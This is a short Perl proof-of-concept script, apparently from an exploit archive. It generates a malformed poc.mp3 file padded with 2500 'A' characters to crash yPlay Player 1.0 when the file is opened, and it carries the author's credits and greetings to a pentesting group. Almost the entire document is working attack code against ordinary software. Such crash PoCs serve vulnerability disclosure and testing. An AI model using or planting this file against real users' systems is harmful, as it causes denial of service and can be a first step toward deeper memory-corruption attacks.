|
#!/usr/bin/perl
# Found By: PLATEN
# yPlay Player 1.0 (.mp3 ) Local File Crash PoC
# http://www.spacejock.com/yPlay_Download.html
# web: Blog: Www.platen.gigfa.coM ~ Www.pentesters.Ir
# Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake and all members in Pentesters.ir
my $crash="A" x 2500;
open(myfile,'>>poc.mp3');
print myfile $crash;
|